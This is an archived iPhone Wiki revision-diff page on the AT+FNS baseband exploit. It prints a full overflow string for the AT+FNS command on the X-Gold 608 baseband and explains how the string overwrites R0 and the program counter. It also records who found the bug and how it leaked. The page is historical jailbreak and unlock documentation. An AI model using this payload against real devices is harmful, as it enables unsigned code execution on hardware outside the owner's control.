The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Difference between revisions of "AT+FNS"
ChronicDev (talk | contribs) m |
m |
||
(5 intermediate revisions by 4 users not shown) | |||
Line 1: | Line 1: | ||
+ | == Credit == |
||
− | An exploit that NitroKey leaked. This exploit could have been used for a 3.1 Unlock. |
||
+ | [[User:Oranav|Oranav]] |
||
+ | ==Exploit== |
||
− | Wait, is that last part confirmed? I thought that FNS was gone already... |
||
+ | There is a stack overflow in the AT+FNS=0,"..." command, which allows unsigned code execution on the [[X-Gold 608]] |
||
+ | |||
+ | AT+FNS="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
||
+ | 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
||
+ | 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
||
+ | 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
||
+ | 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
||
+ | 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
||
+ | 0000000000000000000000000000001111112222333344445555666677" |
||
+ | |||
+ | The exploit overwrites R0 and R2 on the stack, and R2 is copied to PC on exit from the routine. Therefore it can be used to overwrite R0 and PC. |
||
+ | |||
+ | == Description == |
||
+ | Yet another buffer overflow in AT commands, like [[AT+XLOG Vulnerability|AT+XLOG]] and [[At+stkprof|AT+stkprof]]. Leaked by [[NitroKey]] who somehow intercepted the information and pastied it with hashes shortly after [[User:Oranav|Oranav]] had disclosed it to the [[iPhone Dev Team]]. |
||
+ | |||
+ | {{stub|exploit}} |
||
+ | [[Category:Baseband Exploits]] |
Latest revision as of 21:00, 24 December 2012
Credit
Exploit
There is a stack overflow in the AT+FNS=0,"..." command, which allows unsigned code execution on the X-Gold 608
AT+FNS="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000001111112222333344445555666677"
The exploit overwrites R0 and R2 on the stack, and R2 is copied to PC on exit from the routine. Therefore it can be used to overwrite R0 and PC.
Description
Yet another buffer overflow in AT commands, like AT+XLOG and AT+stkprof. Leaked by NitroKey who somehow intercepted the information and pastied it with hashes shortly after Oranav had disclosed it to the iPhone Dev Team.
This exploit article is a "stub", an incomplete page. Please add more content to this article and remove this tag. |